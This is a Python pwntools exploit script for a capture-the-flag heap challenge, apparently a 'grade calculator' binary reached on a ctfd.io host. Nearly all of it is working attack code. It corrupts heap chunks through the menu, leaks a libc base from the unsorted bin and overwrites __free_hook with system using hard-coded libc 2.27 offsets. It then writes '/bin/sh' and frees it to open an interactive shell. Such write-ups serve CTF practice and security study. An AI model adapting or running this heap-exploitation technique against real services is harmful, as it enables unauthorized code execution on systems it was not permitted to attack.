| #!/usr/bin/python3 | |
| from pwn import * | |
| from past.builtins import xrange | |
| from time import sleep | |
| import random | |
#Utils
def addcategory(weight, grades):
    """Drive menu option 1 on the global ``io`` channel.

    Selects option ``1`` at the ``> `` prompt, then answers the ``)\\n`` prompt
    with ``weight`` and the ``?\\n`` prompt with ``grades``; both values are
    sent as their ``str()`` form. Returns None.
    """
    dialogue = (
        ('> ', '1'),
        (')\n', f'{weight}'),
        ('?\n', f'{grades}'),
    )
    for prompt, answer in dialogue:
        io.sendlineafter(prompt, answer)
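def setgrades(category, newsize, grades, oldsize=None, shell=False):
    """Drive menu option 2 on the global ``io`` channel: resize a category and fill its grades.

    Args:
        category: value sent at the ``-16)\\n`` prompt.
        newsize: value sent at the ``):\\n`` prompt. When non-zero, ``newsize + 1``
            ``grade:\\n`` prompts are answered; when zero, ``oldsize`` of them are.
        grades: sequence of ints (a list, or the bytes returned by ``p64``) answered
            one per prompt; prompts past ``len(grades)`` are answered with ``0x21``.
        oldsize: number of prompts to answer when ``newsize == 0``; required then.
        shell: when true, return right after the size is sent, answering no grade prompt.

    Returns:
        True when ``shell`` is set, otherwise None.

    Raises:
        TypeError: when ``newsize == 0`` and ``oldsize`` is None (``range(None)``).
    """
    io.sendlineafter('> ', '2')
    io.sendlineafter('-16)\n', f'{category}')
    io.sendlineafter('):\n', f'{newsize}')
    if shell:
        return True
    # Both branches of the original differed only in the loop bound; pick the
    # bound once so the padding rule lives in a single loop.
    count = newsize + 1 if newsize != 0 else oldsize
    for i in range(count):
        # Pad only when `grades` is shorter than the prompt count. The bare
        # `except:` this replaces also swallowed EOFError/KeyboardInterrupt from
        # the channel itself, which then re-sent 0x21 instead of failing loudly.
        try:
            value = grades[i]
        except IndexError:
            value = 0x21
        io.sendlineafter('grade:\n', f'{value}')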
def viewreport():
    """Drive menu option 3 on the global ``io`` channel.

    Returns the raw bytes received up to and including the
    ``'Grade Calculator\\n'`` banner that follows the report.
    """
    banner = 'Grade Calculator\n'
    io.sendlineafter('> ', '3')
    report = io.recvuntil(banner)
    return report
#libc 2.27
# Offsets specific to the libc build named above; __main__ combines them with
# the base it derives from the leaked value. A different libc build needs its
# own set of values — these cannot be reused as-is.
unsorted_bin_offset = 0x3ebca0
system = 0x4f440
__free_hook = 0x3ed8e8
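#Exploit
if __name__ == '__main__':
    # Scripted interaction with the challenge service: every step is menu input
    # driven through the helpers above over the global `io` channel. The order
    # of the steps is load-bearing; do not rearrange them.
    # io = process('./gcalc',env={'LD_PRELOAD':'./libc.so.6'})
    io = remote('challenges.ctfd.io',30253)
    addcategory(1,0x18) #1
    addcategory(1,0x418) #2
    for _ in range(2):  #3 ~ 4 (plain loop; a list comprehension was used only for its side effect)
        addcategory(1,0x18)
    # `== 0x18` replaces `is 0x18`: `is` on an int literal tests identity and
    # only happened to work because CPython caches small ints (SyntaxWarning on 3.8+).
    setgrades(1,0,[0x41 if i == 0x18 else 2 for i in range(0x19)],0x19)
    setgrades(2,0x418,[0x21 for i in range(0x419)])
    # Fourth 'Grades:' section, whitespace removed, first eight comma-separated
    # fields in reverse order; fewer than eight fields raises IndexError below.
    leaks = viewreport().split(b'Grades:')[3].replace(b' ',b'').split(b',')[0:8][::-1]
    # Fold the eight fields into one integer, first field most significant.
    libc_leak = 0
    for j in range(8):
        libc_leak += (int(leaks[j]) & 0xff) << (8 * (7 - j))
    libc_base = libc_leak - unsorted_bin_offset
    print(hex(libc_base))
    addcategory(1,0x18) #5
    setgrades(3,0x47,[0x21 for i in range(0x48)])
    setgrades(5,0x47,[0x21 for i in range(0x48)])
    addcategory(1,0x18) #6
    setgrades(6,0,p64(libc_base+__free_hook),0x19)
    addcategory(1,0x8) #7
    # The constant split into its eight bytes, lowest-order byte first.
    bin_sh_list = [(0x68732f6e69622f >> (8 * i)) & 0xff for i in range(8)]
    setgrades(7,0,bin_sh_list,0x9)
    addcategory(1,0x8) #8
    setgrades(8,0,p64(libc_base+system),0x9)
    setgrades(7,0x18,[0x21 for i in range(0x19)],shell=True)
    io.interactive()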